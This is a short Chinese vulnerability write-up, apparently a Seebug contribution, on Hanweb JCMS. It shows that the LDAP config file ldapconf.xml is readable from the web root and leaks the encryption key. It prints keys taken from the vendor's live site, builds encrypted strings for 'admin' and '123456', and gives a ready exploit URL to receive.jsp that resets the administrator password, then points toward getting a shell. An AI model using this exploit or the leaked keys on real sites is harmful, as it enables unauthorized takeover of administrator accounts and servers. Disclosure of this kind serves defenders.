第一步,大汉网络加解密说明
LDAP密钥配置文件,/interface/ldap/ldapconf.xml
获取密钥:<enckey>o3h2iB8ggnp2</enckey>
![](https://images.seebug.org/contribute/38c78fe8-a97b-46e2-af84-e95e8732c30d-QQ20160107-0@2x.png)
我们可以使用大汉的加解密库进行任意加解密,只要知道服务端的密钥,就可以和服务器进行通讯:
![](https://images.seebug.org/contribute/01cd425d-dfcf-4006-8181-a98067c6fbfb-QQ20160107-2@2x.png)
第二步,保存密钥的ldapconf.xml文件,放在了网站目录,直接可以访问:
我们拿官网,进行一下测试:
访问:http://app.hanweb.com.cn/jcms/interface/ldap/ldapconf.xml
拿到了密钥:<enckey>OJ9Un5JmpTfN0gJx</enckey>
第三步,通过密钥: OJ9Un5JmpTfN0gJx,我们构造如下几个密文:
```
encrypt : e2V1Z3UdA2sNaw==
decrypt : admin
encrypt : DEIBRXBGcUQOM3g0
decrypt : 123456
```
第四步,覆盖管理员密码为:admin - 123456
漏洞EXP:
http://app.hanweb.com.cn/jcms/interface/ldap/receive.jsp?state=C&result=T&loginuser=e2V1Z3UdA2sNaw==&loginpass=DEIBRXBGcUQOM3g0
可以用重置后的密码, 直接登录,自动跳转到登录后台,进入后台Getshell的文章很多啦
暂无评论